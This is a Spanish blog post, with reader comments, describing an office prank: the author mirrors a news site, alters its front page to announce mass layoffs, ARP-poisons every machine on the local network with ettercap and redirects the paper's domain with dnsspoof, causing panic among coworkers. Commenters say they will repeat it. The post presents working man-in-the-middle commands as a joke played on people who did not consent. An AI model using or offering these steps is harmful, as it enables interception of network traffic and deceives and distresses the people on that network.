La verdad absoluta

Diciembre 30th, 2009

El pasado 28 de diciembre, con motivo del día de los Santos Inocentes, y tal y como marca la tradición, decidí gastar una pequeña broma a mis compañeros de trabajo.

Nada demasiado sofisticado, pero lo suficiente para reírnos un rato. Decidí hacer aparecer en un famoso diario online una noticia que tenía que ver con EREs y que nos afectaba especialmente (muahahahaha).

Pues nada, os resumo rápido para no aburriros más de la cuenta…

1. Creé una copia local del diario

$ wget -r http://famoso.diario.español.es

2. Monté un servidor Apache y alojé ahí la copia

3. Modifiqué la portada para poner la fatídica noticia (algo así como: van a despedirnos a todos)

3. Envenené la caché ARP de todos los equipos locales

# ettercap -Tq -M arp:remote //

4. Y por último, puse a funcionar un ataque de DNS Spoofing

# dnsspoof -i eth0 -f hosts

El fichero hosts contenía la nueva asociación que me interesaba:

172.20.16.195 *.famosodiarioespañol.com

Esto significaba que cada vez que alguien intentara resolver esa dirección, yo le enviaría la IP de mi equipo, de tal forma que sería a mi servidor local a donde accederían.

Resultado final

Ahora en los navegadores de todo el mundo salía mi copia local del famoso periódico con la noticia alterada. El resultado fue el pánico general porque lo que hay en Internet es la verdad absoluta. Podría haber puesto que los alienígenas nos invandían o que el Gran Colisionador había generado un agujero negro estable, da igual lo absurdo o irracional de la noticia, si está en algún sitio enlazado por Google con buen pagerank, debe ser cierta.

Absolutamente delirante.

Categorías: reflexiones |

6 comentarios

  1. Bitacoras.com

    Información Bitacoras.com…

    Valora en Bitacoras.com: El pasado 28 de diciembre, con motivo del día de los Santos Inocentes, y tal y como marca la tradición, decidí gastar una pequeña broma a mis compañeros de trabajo. Nada demasiado sofisticado, pero lo suficiente para reírnos …..

  2. Lisan al-Gaib

    Cuanto tiempo hacía que no entraba por aquí.
    Te puedo decir que aquí hay cierta persona a la que no le gusta hablar mucho que esta contando las batallas de otros 28 de diciembre y me la estoy partiendo recordando el caso de los destrozos del huracán Delta en Teror.
    Que recuerdos xD

  3. NachE

    Me apunto la broma para otra ocasión … .jajajaja

  4. bitozoid

    Muy bueno. También me la apunto.

  5. SynWenn

    @Lisan al-Gaib: el recuerdo que me viene a mí, es el de cierta personal llamando por teléfono a ver si su marido iba a ir a la cárcel o no. Somos unos animalitos…

    @NachE, @bitozoid: a disfrutar de la broma, pero tened cuidado porque si sois tan bestias como yo, puede que luego tengáis que salir corriendo :P

  6. Shanakadu

    juas juas juas juas juas

Deja un comentario